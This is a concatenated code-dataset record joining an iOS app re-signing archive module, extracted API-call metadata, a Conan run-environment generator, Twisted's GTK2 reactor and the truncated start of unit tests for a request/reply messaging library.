But we want to respect the desired # output_path's extension, which could be ".ipa" or who knows. # So we move it to the output_path later. # # We also do a little dance with making another temp directory just # to construct the zip file. This is the best way to ensure the an unused # filename. Also, `zip` won't overwrite existing files, so this is safer. temp_zip_dir = None try: # need to chdir and use relative paths, because zip is stupid temp_zip_dir = tempfile.mkdtemp(prefix="isign-zip-") temp_zip_file = join(temp_zip_dir, 'temp.zip') call([get_helper('zip'), "-qr", temp_zip_file, "."], cwd=containing_dir) shutil.move(temp_zip_file, output_path) log.info("archived %s to %s" % (cls.__name__, output_path)) finally: if temp_zip_dir is not None and isdir(temp_zip_dir): shutil.rmtree(temp_zip_dir) class IpaArchive(AppZipArchive): """ IPA is Apple's standard for distributing apps. Much like an AppZip, but slightly different paths """ extensions = ['.ipa'] app_dir_pattern = r'^(Payload/[^/]+\.app/).*$' class UncompressedArchive(object): """ This just keeps track of some state with an unzipped app archive and how to re-zip it back up once re-signed. The bundle is located somewhere inside the containing directory, but might be a few directories down, like in a ContainingDir/Payload/something.app This class is also useful if you have an app that's already unzipped and you want to sign it. """ def __init__(self, path, relative_bundle_dir, archive_class): """ Path is the "Containing dir", the dir at the root level of the unzipped archive (or the dir itself, in the case of an AppArchive archive) relative bundle dir is the dir containing the bundle, e.g. Payload/Foo.app archive class is the kind of archive this was (Ipa, etc.) """ self.path = path self.relative_bundle_dir = relative_bundle_dir self.archive_class = archive_class bundle_path = normpath(join(path, relative_bundle_dir)) self.bundle = App(bundle_path) def archive(self, output_path): """ Re-zip this back up, or simply copy it out, depending on what the original archive class did """ self.archive_class.archive(self.path, output_path) def clone(self, target_path): """ Copy the uncompressed archive somewhere else, return initialized UncompressedArchive """ shutil.copytree(self.path, target_path) return self.__class__(target_path, self.relative_bundle_dir, self.archive_class) def remove(self): # the containing dir might be gone already b/c AppArchive simply moves # it to the desired target when done if exists(self.path) and isdir(self.path): log.debug('removing ua: %s', self.path) shutil.rmtree(self.path) def archive_factory(path): """ Guess what kind of archive we are dealing with, return an archive object. Returns None if path did not match any archive type """ archive = None for cls in [IpaArchive, AppZipArchive, AppArchive]: if cls.precheck(path): archive = cls(path) log.debug("File %s matched as %s", path, cls.__name__) break return archive def view(input_path): if not exists(input_path): raise IOError("{0} not found".format(input_path)) ua = None bundle_info = None try: archive = archive_factory(input_path) if archive is None: raise NotMatched('No matching archive type found') ua = archive.unarchive_to_temp() bundle_info = ua.bundle.info finally: if ua is not None: ua.remove() return bundle_info def resign(input_path, certificate, key, apple_cert, provisioning_profile, output_path, info_props=None, alternate_entitlements_path=None): """ Unified interface to extract any kind of archive from a temporary file, resign it with these credentials, and create a similar archive for that resigned app """ if not exists(input_path): raise IOError("{0} not found".format(input_path)) log.debug('Signing with apple_cert: {}'.format(apple_cert)) log.debug('Signing with key: {}'.format(key)) log.debug('Signing with certificate: {}'.format(certificate)) log.debug('Signing with provisioning_profile: {}'.format(provisioning_profile)) signer = Signer(signer_cert_file=certificate, signer_key_file=key, apple_cert_file=apple_cert) ua = None bundle_info = None try: archive = archive_factory(input_path) if archive is None: raise NotSignable('No matching archive type found') ua = archive.unarchive_to_temp() if info_props: # Override info.plist props of the parent bundle ua.bundle.update_info_props(info_props) ua.bundle.resign(signer, provisioning_profile, alternate_entitlements_path) bundle_info = ua.bundle.info ua.archive(output_path) except NotSignable as e: msg = "Not signable: <{0}>: {1}\n".format(input_path, e) log.info(msg) raise finally: if ua is not None: ua.remove() return bundle_info
[ "logging.getLogger", "exceptions.MissingHelpers", "signer.Signer", "zipfile.ZipFile", "exceptions.NotMatched", "os.walk", "os.path.exists", "shutil.move", "bundle.is_info_plist_native", "bundle.Bundle", "os.path.isdir", "biplist.readPlistFromString", "exceptions.NotSignable", "re.match", "os.path.isfile", "os.path.dirname", "tempfile.mkdtemp", "zipfile.is_zipfile", "distutils.spawn.find_executable", "os.path.join", "bundle.App", "shutil.copytree", "shutil.rmtree" ]
[((706, 733), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (723, 733), False, 'import logging\n'), ((1296, 1329), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'prefix': '"""isign-"""'}), "(prefix='isign-')\n", (1312, 1329), False, 'import tempfile\n'), ((1790, 1815), 'os.walk', 'os.walk', (['root_bundle_path'], {}), '(root_bundle_path)\n', (1797, 1815), False, 'import os\n'), ((14421, 14511), 'signer.Signer', 'Signer', ([], {'signer_cert_file': 'certificate', 'signer_key_file': 'key', 'apple_cert_file': 'apple_cert'}), '(signer_cert_file=certificate, signer_key_file=key, apple_cert_file=\n apple_cert)\n', (14427, 14511), False, 'from signer import Signer\n'), ((1053, 1087), 'distutils.spawn.find_executable', 'spawn.find_executable', (['helper_name'], {}), '(helper_name)\n', (1074, 1087), False, 'from distutils import spawn\n'), ((4526, 4553), 'bundle.is_info_plist_native', 'is_info_plist_native', (['plist'], {}), '(plist)\n', (4546, 4553), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((4702, 4721), 'os.path.exists', 'exists', (['output_path'], {}), '(output_path)\n', (4708, 4721), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((4770, 4800), 'shutil.move', 'shutil.move', (['path', 'output_path'], {}), '(path, output_path)\n', (4781, 4800), False, 'import shutil\n'), ((5179, 5208), 'shutil.rmtree', 'shutil.rmtree', (['containing_dir'], {}), '(containing_dir)\n', (5192, 5208), False, 'import shutil\n'), ((5267, 5309), 'shutil.copytree', 'shutil.copytree', (['self.path', 'containing_dir'], {}), '(self.path, containing_dir)\n', (5282, 5309), False, 'import shutil\n'), ((7158, 7197), 'os.path.join', 'join', (['relative_bundle_dir', '"""Info.plist"""'], {}), "(relative_bundle_dir, 'Info.plist')\n", (7162, 7197), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((8621, 8661), 'biplist.readPlistFromString', 'biplist.readPlistFromString', (['plist_bytes'], {}), '(plist_bytes)\n', (8648, 8661), False, 'import biplist\n'), ((8740, 8761), 'zipfile.ZipFile', 'zipfile.ZipFile', (['path'], {}), '(path)\n', (8755, 8761), False, 'import zipfile\n'), ((11904, 11920), 'bundle.App', 'App', (['bundle_path'], {}), '(bundle_path)\n', (11907, 11920), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((12294, 12333), 'shutil.copytree', 'shutil.copytree', (['self.path', 'target_path'], {}), '(self.path, target_path)\n', (12309, 12333), False, 'import shutil\n'), ((13222, 13240), 'os.path.exists', 'exists', (['input_path'], {}), '(input_path)\n', (13228, 13240), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((14064, 14082), 'os.path.exists', 'exists', (['input_path'], {}), '(input_path)\n', (14070, 14082), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((1909, 1921), 'bundle.Bundle', 'Bundle', (['path'], {}), '(path)\n', (1915, 1921), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((2805, 2852), 'exceptions.NotSignable', 'NotSignable', (['"""Cannot yet sign WatchKit bundles"""'], {}), "('Cannot yet sign WatchKit bundles')\n", (2816, 2852), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((4350, 4361), 'os.path.isdir', 'isdir', (['path'], {}), '(path)\n', (4355, 4361), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((4735, 4761), 'shutil.rmtree', 'shutil.rmtree', (['output_path'], {}), '(output_path)\n', (4748, 4761), False, 'import shutil\n'), ((6664, 6704), 're.match', 're.match', (['cls.app_dir_pattern', 'file_name'], {}), '(cls.app_dir_pattern, file_name)\n', (6672, 6704), False, 'import re\n'), ((7495, 7507), 'os.path.isfile', 'isfile', (['path'], {}), '(path)\n', (7501, 7507), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((7593, 7630), 'exceptions.MissingHelpers', 'MissingHelpers', (['"""helpers not present"""'], {}), "('helpers not present')\n", (7607, 7630), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((7792, 7816), 'zipfile.is_zipfile', 'zipfile.is_zipfile', (['path'], {}), '(path)\n', (7810, 7816), False, 'import zipfile\n'), ((7904, 7925), 'zipfile.ZipFile', 'zipfile.ZipFile', (['path'], {}), '(path)\n', (7919, 7925), False, 'import zipfile\n'), ((9129, 9175), 'os.path.join', 'join', (['containing_dir', 'self.relative_bundle_dir'], {}), '(containing_dir, self.relative_bundle_dir)\n', (9133, 9175), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((10199, 10236), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'prefix': '"""isign-zip-"""'}), "(prefix='isign-zip-')\n", (10215, 10236), False, 'import tempfile\n'), ((10265, 10295), 'os.path.join', 'join', (['temp_zip_dir', '"""temp.zip"""'], {}), "(temp_zip_dir, 'temp.zip')\n", (10269, 10295), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((10393, 10432), 'shutil.move', 'shutil.move', (['temp_zip_file', 'output_path'], {}), '(temp_zip_file, output_path)\n', (10404, 10432), False, 'import shutil\n'), ((11849, 11880), 'os.path.join', 'join', (['path', 'relative_bundle_dir'], {}), '(path, relative_bundle_dir)\n', (11853, 11880), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((12641, 12658), 'os.path.exists', 'exists', (['self.path'], {}), '(self.path)\n', (12647, 12658), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((12663, 12679), 'os.path.isdir', 'isdir', (['self.path'], {}), '(self.path)\n', (12668, 12679), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((12745, 12769), 'shutil.rmtree', 'shutil.rmtree', (['self.path'], {}), '(self.path)\n', (12758, 12769), False, 'import shutil\n'), ((13438, 13482), 'exceptions.NotMatched', 'NotMatched', (['"""No matching archive type found"""'], {}), "('No matching archive type found')\n", (13448, 13482), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((14686, 14731), 'exceptions.NotSignable', 'NotSignable', (['"""No matching archive type found"""'], {}), "('No matching archive type found')\n", (14697, 14731), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((2144, 2157), 'os.path.dirname', 'dirname', (['path'], {}), '(path)\n', (2151, 2157), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((2753, 2772), 'shutil.rmtree', 'shutil.rmtree', (['path'], {}), '(path)\n', (2766, 2772), False, 'import shutil\n'), ((8304, 8331), 'bundle.is_info_plist_native', 'is_info_plist_native', (['plist'], {}), '(plist)\n', (8324, 8331), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((10566, 10585), 'os.path.isdir', 'isdir', (['temp_zip_dir'], {}), '(temp_zip_dir)\n', (10571, 10585), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((10603, 10630), 'shutil.rmtree', 'shutil.rmtree', (['temp_zip_dir'], {}), '(temp_zip_dir)\n', (10616, 10630), False, 'import shutil\n')]
from conan.tools.env import Environment def runenv_from_cpp_info(conanfile, cpp_info): """ return an Environment deducing the runtime information from a cpp_info """ dyn_runenv = Environment(conanfile) if cpp_info is None: # This happens when the dependency is a private one = BINARY_SKIP return dyn_runenv if cpp_info.bin_paths: # cpp_info.exes is not defined yet dyn_runenv.prepend_path("PATH", cpp_info.bin_paths) # If it is a build_require this will be the build-os, otherwise it will be the host-os if cpp_info.lib_paths: dyn_runenv.prepend_path("LD_LIBRARY_PATH", cpp_info.lib_paths) dyn_runenv.prepend_path("DYLD_LIBRARY_PATH", cpp_info.lib_paths) if cpp_info.framework_paths: dyn_runenv.prepend_path("DYLD_FRAMEWORK_PATH", cpp_info.framework_paths) return dyn_runenv class VirtualRunEnv: """ captures the conanfile environment that is defined from its dependencies, and also from profiles """ def __init__(self, conanfile): self._conanfile = conanfile def environment(self): """ collects the runtime information from dependencies. For normal libraries should be very occasional """ runenv = Environment(self._conanfile) # FIXME: Missing profile info # FIXME: Cache value? host_req = self._conanfile.dependencies.host test_req = self._conanfile.dependencies.test for _, dep in list(host_req.items()) + list(test_req.items()): if dep.runenv_info: runenv.compose_env(dep.runenv_info) runenv.compose_env(runenv_from_cpp_info(self._conanfile, dep.cpp_info)) return runenv def generate(self, auto_activate=False): run_env = self.environment() if run_env: run_env.save_script("conanrunenv", auto_activate=auto_activate)
[ "conan.tools.env.Environment" ]
[((193, 215), 'conan.tools.env.Environment', 'Environment', (['conanfile'], {}), '(conanfile)\n', (204, 215), False, 'from conan.tools.env import Environment\n'), ((1243, 1271), 'conan.tools.env.Environment', 'Environment', (['self._conanfile'], {}), '(self._conanfile)\n', (1254, 1271), False, 'from conan.tools.env import Environment\n')]
# -*- test-case-name: twisted.internet.test -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ This module provides support for Twisted to interact with the glib/gtk2 mainloop. In order to use this support, simply do the following:: | from twisted.internet import gtk2reactor | gtk2reactor.install() Then use twisted.internet APIs as usual. The other methods here are not intended to be called directly. When installing the reactor, you can choose whether to use the glib event loop or the GTK+ event loop which is based on it but adds GUI integration. """ # System Imports import sys, signal from zope.interface import implements try: if not hasattr(sys, 'frozen'): # Don't want to check this for py2exe import pygtk pygtk.require('2.0') except (ImportError, AttributeError): pass # maybe we're using pygtk before this hack existed. import gobject if hasattr(gobject, "threads_init"): # recent versions of python-gtk expose this. python-gtk=2.4.1 # (wrapping glib-2.4.7) does. python-gtk=2.0.0 (wrapping # glib-2.2.3) does not. gobject.threads_init() # Twisted Imports from twisted.python import log, runtime, failure from twisted.python.compat import set from twisted.internet.interfaces import IReactorFDSet from twisted.internet import main, base, posixbase, error, selectreactor POLL_DISCONNECTED = gobject.IO_HUP | gobject.IO_ERR | gobject.IO_NVAL # glib's iochannel sources won't tell us about any events that we haven't # asked for, even if those events aren't sensible inputs to the poll() # call. INFLAGS = gobject.IO_IN | POLL_DISCONNECTED OUTFLAGS = gobject.IO_OUT | POLL_DISCONNECTED def _our_mainquit(): # XXX: gtk.main_quit() (which is used for crash()) raises an exception if # gtk.main_level() == 0; however, all the tests freeze if we use this # function to stop the reactor. what gives? (I believe this may have been # a stupid mistake where I forgot to import gtk here... I will remove this # comment if the tests pass) import gtk if gtk.main_level(): gtk.main_quit() class Gtk2Reactor(posixbase.PosixReactorBase): """ GTK+-2 event loop reactor. @ivar _sources: A dictionary mapping L{FileDescriptor} instances to gtk watch handles. @ivar _reads: A set of L{FileDescriptor} instances currently monitored for reading. @ivar _writes: A set of L{FileDescriptor} instances currently monitored for writing. @ivar _simtag: A gtk timeout handle for the next L{simulate} call. """ implements(IReactorFDSet) def __init__(self, useGtk=True): self._simtag = None self._reads = set() self._writes = set() self._sources = {} posixbase.PosixReactorBase.__init__(self) # pre 2.3.91 the glib iteration and mainloop functions didn't release # global interpreter lock, thus breaking thread and signal support. if getattr(gobject, "pygtk_version", ()) >= (2, 3, 91) and not useGtk: self.context = gobject.main_context_default() self.__pending = self.context.pending self.__iteration = self.context.iteration self.loop = gobject.MainLoop() self.__crash = self.loop.quit self.__run = self.loop.run else: import gtk self.__pending = gtk.events_pending self.__iteration = gtk.main_iteration self.__crash = _our_mainquit self.__run = gtk.main if runtime.platformType == 'posix': def _handleSignals(self): # Let the base class do its thing, but pygtk is probably # going to stomp on us so go beyond that and set up some # signal handling which pygtk won't mess with. This would # be better done by letting this reactor select a # different implementation of installHandler for # _SIGCHLDWaker to use. Then, at least, we could fall # back to our extension module. See #4286. from twisted.internet.process import reapAllProcesses as _reapAllProcesses base._SignalReactorMixin._handleSignals(self) signal.signal(signal.SIGCHLD, lambda *a: self.callFromThread(_reapAllProcesses)) if getattr(signal, "siginterrupt", None) is not None: signal.siginterrupt(signal.SIGCHLD, False) # Like the base, reap processes now in case a process # exited before the handlers above were installed. _reapAllProcesses() # The input_add function in pygtk1 checks for objects with a # 'fileno' method and, if present, uses the result of that method # as the input source. The pygtk2 input_add does not do this. The # function below replicates the pygtk1 functionality. # In addition, pygtk maps gtk.input_add to _gobject.io_add_watch, and # g_io_add_watch() takes different condition bitfields than # gtk_input_add(). We use g_io_add_watch() here in case pygtk fixes this # bug. def input_add(self, source, condition, callback): if hasattr(source, 'fileno'): # handle python objects def wrapper(source, condition, real_s=source, real_cb=callback): return real_cb(real_s, condition) return gobject.io_add_watch(source.fileno(), condition, wrapper) else: return gobject.io_add_watch(source, condition, callback) def _add(self, source, primary, other, primaryFlag, otherFlag): """ Add the given L{FileDescriptor} for monitoring either for reading or writing. If the file is already monitored for the other operation, we delete the previous registration and re-register it for both reading and writing. """ if source in primary: return flags = primaryFlag if source in other: gobject.source_remove(self._sources[source]) flags |= otherFlag self._sources[source] = self.input_add(source, flags, self.callback) primary.add(source) def addReader(self, reader): """ Add a L{FileDescriptor} for monitoring of data available to read. """ self._add(reader, self._reads, self._writes, INFLAGS, OUTFLAGS) def addWriter(self, writer): """ Add a L{FileDescriptor} for monitoring ability to write data. """ self._add(writer, self._writes, self._reads, OUTFLAGS, INFLAGS) def getReaders(self): """ Retrieve the list of current L{FileDescriptor} monitored for reading. """ return list(self._reads) def getWriters(self): """ Retrieve the list of current L{FileDescriptor} monitored for writing. """ return list(self._writes) def removeAll(self): """ Remove monitoring for all registered L{FileDescriptor}s. """ return self._removeAll(self._reads, self._writes) def _remove(self, source, primary, other, flags): """ Remove monitoring the given L{FileDescriptor} for either reading or writing. If it's still monitored for the other operation, we re-register the L{FileDescriptor} for only that operation. """ if source not in primary: return gobject.source_remove(self._sources[source]) primary.remove(source) if source in other: self._sources[source] = self.input_add( source, flags, self.callback) else: self._sources.pop(source) def removeReader(self, reader): """ Stop monitoring the given L{FileDescriptor} for reading. """ self._remove(reader, self._reads, self._writes, OUTFLAGS) def removeWriter(self, writer): """ Stop monitoring the given L{FileDescriptor} for writing. """ self._remove(writer, self._writes, self._reads, INFLAGS) doIterationTimer = None def doIterationTimeout(self, *args): self.doIterationTimer = None return 0 # auto-remove def doIteration(self, delay): # flush some pending events, return if there was something to do # don't use the usual "while self.context.pending(): self.context.iteration()" # idiom because lots of IO (in particular test_tcp's # ProperlyCloseFilesTestCase) can keep us from ever exiting. log.msg(channel='system', event='iteration', reactor=self) if self.__pending(): self.__iteration(0) return # nothing to do, must delay if delay == 0: return # shouldn't delay, so just return self.doIterationTimer = gobject.timeout_add(int(delay * 1000), self.doIterationTimeout) # This will either wake up from IO or from a timeout. self.__iteration(1) # block # note: with the .simulate timer below, delays > 0.1 will always be # woken up by the .simulate timer if self.doIterationTimer: # if woken by IO, need to cancel the timer gobject.source_remove(self.doIterationTimer) self.doIterationTimer = None def crash(self): posixbase.PosixReactorBase.crash(self) self.__crash() def run(self, installSignalHandlers=1): self.startRunning(installSignalHandlers=installSignalHandlers) gobject.timeout_add(0, self.simulate) if self._started: self.__run() def _doReadOrWrite(self, source, condition, faildict={ error.ConnectionDone: failure.Failure(error.ConnectionDone()), error.ConnectionLost: failure.Failure(error.ConnectionLost()), }): why = None inRead = False if condition & POLL_DISCONNECTED and not (condition & gobject.IO_IN): if source in self._reads: why = main.CONNECTION_DONE inRead = True else: why = main.CONNECTION_LOST else: try: if condition & gobject.IO_IN: why = source.doRead() inRead = True if not why and condition & gobject.IO_OUT: # if doRead caused connectionLost, don't call doWrite # if doRead is doWrite, don't call it again. if not source.disconnected: why = source.doWrite() except: why = sys.exc_info()[1] log.msg('Error In %s' % source) log.deferr() if why: self._disconnectSelectable(source, why, inRead) def callback(self, source, condition): log.callWithLogger(source, self._doReadOrWrite, source, condition) self.simulate() # fire Twisted timers return 1 # 1=don't auto-remove the source def simulate(self): """ Run simulation loops and reschedule callbacks. """ if self._simtag is not None: gobject.source_remove(self._simtag) self.runUntilCurrent() timeout = min(self.timeout(), 0.1) if timeout is None: timeout = 0.1 # grumble self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate) class PortableGtkReactor(selectreactor.SelectReactor): """ Reactor that works on Windows. Sockets aren't supported by GTK+'s input_add on Win32. """ _simtag = None def crash(self): selectreactor.SelectReactor.crash(self) import gtk # mainquit is deprecated in newer versions if gtk.main_level(): if hasattr(gtk, 'main_quit'): gtk.main_quit() else: gtk.mainquit() def run(self, installSignalHandlers=1): import gtk self.startRunning(installSignalHandlers=installSignalHandlers) gobject.timeout_add(0, self.simulate) # mainloop is deprecated in newer versions if hasattr(gtk, 'main'): gtk.main() else: gtk.mainloop() def simulate(self): """ Run simulation loops and reschedule callbacks. """ if self._simtag is not None: gobject.source_remove(self._simtag) self.iterate() timeout = min(self.timeout(), 0.1) if timeout is None: timeout = 0.1 # grumble self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate) def install(useGtk=True): """ Configure the twisted mainloop to be run inside the gtk mainloop. @param useGtk: should glib rather than GTK+ event loop be used (this will be slightly faster but does not support GUI). """ reactor = Gtk2Reactor(useGtk) from twisted.internet.main import installReactor installReactor(reactor) return reactor def portableInstall(useGtk=True): """ Configure the twisted mainloop to be run inside the gtk mainloop. """ reactor = PortableGtkReactor() from twisted.internet.main import installReactor installReactor(reactor) return reactor if runtime.platform.getType() != 'posix': install = portableInstall __all__ = ['install']
[ "twisted.internet.posixbase.PosixReactorBase.__init__", "twisted.internet.process.reapAllProcesses", "zope.interface.implements", "signal.siginterrupt", "sys.exc_info", "twisted.python.log.deferr", "twisted.python.runtime.platform.getType", "twisted.internet.error.ConnectionDone", "twisted.internet.posixbase.PosixReactorBase.crash", "twisted.python.compat.set", "gtk.main_level", "gtk.mainquit", "gtk.main_quit", "gobject.threads_init", "twisted.python.log.msg", "pygtk.require", "twisted.python.log.callWithLogger", "gobject.main_context_default", "gobject.MainLoop", "gtk.main", "twisted.internet.main.installReactor", "twisted.internet.error.ConnectionLost", "twisted.internet.base._SignalReactorMixin._handleSignals", "gobject.io_add_watch", "twisted.internet.selectreactor.SelectReactor.crash", "gobject.timeout_add", "gobject.source_remove", "gtk.mainloop" ]
[((1126, 1148), 'gobject.threads_init', 'gobject.threads_init', ([], {}), '()\n', (1146, 1148), False, 'import gobject\n'), ((2087, 2103), 'gtk.main_level', 'gtk.main_level', ([], {}), '()\n', (2101, 2103), False, 'import gtk\n'), ((2597, 2622), 'zope.interface.implements', 'implements', (['IReactorFDSet'], {}), '(IReactorFDSet)\n', (2607, 2622), False, 'from zope.interface import implements\n'), ((12990, 13013), 'twisted.internet.main.installReactor', 'installReactor', (['reactor'], {}), '(reactor)\n', (13004, 13013), False, 'from twisted.internet.main import installReactor\n'), ((13248, 13271), 'twisted.internet.main.installReactor', 'installReactor', (['reactor'], {}), '(reactor)\n', (13262, 13271), False, 'from twisted.internet.main import installReactor\n'), ((13297, 13323), 'twisted.python.runtime.platform.getType', 'runtime.platform.getType', ([], {}), '()\n', (13321, 13323), False, 'from twisted.python import log, runtime, failure\n'), ((795, 815), 'pygtk.require', 'pygtk.require', (['"""2.0"""'], {}), "('2.0')\n", (808, 815), False, 'import pygtk\n'), ((2113, 2128), 'gtk.main_quit', 'gtk.main_quit', ([], {}), '()\n', (2126, 2128), False, 'import gtk\n'), ((2711, 2716), 'twisted.python.compat.set', 'set', ([], {}), '()\n', (2714, 2716), False, 'from twisted.python.compat import set\n'), ((2740, 2745), 'twisted.python.compat.set', 'set', ([], {}), '()\n', (2743, 2745), False, 'from twisted.python.compat import set\n'), ((2781, 2822), 'twisted.internet.posixbase.PosixReactorBase.__init__', 'posixbase.PosixReactorBase.__init__', (['self'], {}), '(self)\n', (2816, 2822), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((7418, 7462), 'gobject.source_remove', 'gobject.source_remove', (['self._sources[source]'], {}), '(self._sources[source])\n', (7439, 7462), False, 'import gobject\n'), ((8531, 8589), 'twisted.python.log.msg', 'log.msg', ([], {'channel': '"""system"""', 'event': '"""iteration"""', 'reactor': 'self'}), "(channel='system', event='iteration', reactor=self)\n", (8538, 8589), False, 'from twisted.python import log, runtime, failure\n'), ((9360, 9398), 'twisted.internet.posixbase.PosixReactorBase.crash', 'posixbase.PosixReactorBase.crash', (['self'], {}), '(self)\n', (9392, 9398), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((9547, 9584), 'gobject.timeout_add', 'gobject.timeout_add', (['(0)', 'self.simulate'], {}), '(0, self.simulate)\n', (9566, 9584), False, 'import gobject\n'), ((10856, 10922), 'twisted.python.log.callWithLogger', 'log.callWithLogger', (['source', 'self._doReadOrWrite', 'source', 'condition'], {}), '(source, self._doReadOrWrite, source, condition)\n', (10874, 10922), False, 'from twisted.python import log, runtime, failure\n'), ((11652, 11691), 'twisted.internet.selectreactor.SelectReactor.crash', 'selectreactor.SelectReactor.crash', (['self'], {}), '(self)\n', (11685, 11691), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((11773, 11789), 'gtk.main_level', 'gtk.main_level', ([], {}), '()\n', (11787, 11789), False, 'import gtk\n'), ((12058, 12095), 'gobject.timeout_add', 'gobject.timeout_add', (['(0)', 'self.simulate'], {}), '(0, self.simulate)\n', (12077, 12095), False, 'import gobject\n'), ((3083, 3113), 'gobject.main_context_default', 'gobject.main_context_default', ([], {}), '()\n', (3111, 3113), False, 'import gobject\n'), ((3242, 3260), 'gobject.MainLoop', 'gobject.MainLoop', ([], {}), '()\n', (3258, 3260), False, 'import gobject\n'), ((4182, 4227), 'twisted.internet.base._SignalReactorMixin._handleSignals', 'base._SignalReactorMixin._handleSignals', (['self'], {}), '(self)\n', (4221, 4227), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((4587, 4606), 'twisted.internet.process.reapAllProcesses', '_reapAllProcesses', ([], {}), '()\n', (4604, 4606), True, 'from twisted.internet.process import reapAllProcesses as _reapAllProcesses\n'), ((5463, 5512), 'gobject.io_add_watch', 'gobject.io_add_watch', (['source', 'condition', 'callback'], {}), '(source, condition, callback)\n', (5483, 5512), False, 'import gobject\n'), ((5977, 6021), 'gobject.source_remove', 'gobject.source_remove', (['self._sources[source]'], {}), '(self._sources[source])\n', (5998, 6021), False, 'import gobject\n'), ((9243, 9287), 'gobject.source_remove', 'gobject.source_remove', (['self.doIterationTimer'], {}), '(self.doIterationTimer)\n', (9264, 9287), False, 'import gobject\n'), ((11173, 11208), 'gobject.source_remove', 'gobject.source_remove', (['self._simtag'], {}), '(self._simtag)\n', (11194, 11208), False, 'import gobject\n'), ((12192, 12202), 'gtk.main', 'gtk.main', ([], {}), '()\n', (12200, 12202), False, 'import gtk\n'), ((12229, 12243), 'gtk.mainloop', 'gtk.mainloop', ([], {}), '()\n', (12241, 12243), False, 'import gtk\n'), ((12398, 12433), 'gobject.source_remove', 'gobject.source_remove', (['self._simtag'], {}), '(self._simtag)\n', (12419, 12433), False, 'import gobject\n'), ((4403, 4445), 'signal.siginterrupt', 'signal.siginterrupt', (['signal.SIGCHLD', '(False)'], {}), '(signal.SIGCHLD, False)\n', (4422, 4445), False, 'import sys, signal\n'), ((9743, 9765), 'twisted.internet.error.ConnectionDone', 'error.ConnectionDone', ([], {}), '()\n', (9763, 9765), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((9814, 9836), 'twisted.internet.error.ConnectionLost', 'error.ConnectionLost', ([], {}), '()\n', (9834, 9836), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\n'), ((11849, 11864), 'gtk.main_quit', 'gtk.main_quit', ([], {}), '()\n', (11862, 11864), False, 'import gtk\n'), ((11899, 11913), 'gtk.mainquit', 'gtk.mainquit', ([], {}), '()\n', (11911, 11913), False, 'import gtk\n'), ((10665, 10696), 'twisted.python.log.msg', 'log.msg', (["('Error In %s' % source)"], {}), "('Error In %s' % source)\n", (10672, 10696), False, 'from twisted.python import log, runtime, failure\n'), ((10713, 10725), 'twisted.python.log.deferr', 'log.deferr', ([], {}), '()\n', (10723, 10725), False, 'from twisted.python import log, runtime, failure\n'), ((10631, 10645), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (10643, 10645), False, 'import sys, signal\n')]
# -*- coding: utf-8 -*- from unittest import TestCase, TestLoader from radio import (Radio, ListenerNotFound, ReplyHandlerAlreadyBound, HandlerAlreadyBound) def init_radio(f): def wrap(self, *args): self.radio = Radio() return f(self, *args) return wrap class TestRadioRequestReplyMethods(TestCase): @init_radio def test_request_reply_stop_replying(self): ''' "request", "reply" and "stopReplying" methods work correctly. ''' def foo_handler(): return 'foo' def bar_handler(my_arg=222): return my_arg self.radio.reply('foo', foo_handler) self.radio.reply('bar', bar_handler) self.assertEqual(self.radio.request('foo'), 'foo') self.assertEqual(self.radio.request('bar'), 222) self.assertEqual(self.radio.request('bar', 333), 333) self.assertEqual(self.radio.request('bar', my_arg=444), 444) self.radio.stopReplying('foo') self.radio.stopReplying('bar') with self.assertRaises(ListenerNotFound): self.radio.request('foo') with self.assertRaises(ListenerNotFound): self.radio.request('bar') @init_radio def test_kwargs(self): ''' Keyword arguments works correctly. ''' foo_list = [] def foo_handler(foo, bar): return (foo, bar) self.radio.reply('foo', foo_handler) self.assertEqual(self.radio.request('foo', bar=5, foo=10), (10, 5)) @init_radio def test_on_already_bound(self): ''' "reply" fails when trying to bound handler that is already bounded. ''' def foo_handler(): pass self.radio.reply('foo', foo_handler) self.radio.reply('bar', foo_handler) # General exception with self.assertRaises(HandlerAlreadyBound): self.radio.reply('foo', foo_handler) # Child exception with self.assertRaises(ReplyHandlerAlreadyBound): self.radio.reply('foo', foo_handler) @init_radio def test_off_handler_that_was_not_bounded(self): ''' "stopReplying" fails when trying to unbound handler that was not bounded. ''' def foo_handler(): pass with self.assertRaises(ListenerNotFound): self.radio.stopReplying('foo', foo_handler) @init_radio def test_off_soft_mode(self): ''' "stopReplying" will not fail if safe-argument is set to True. ''' def 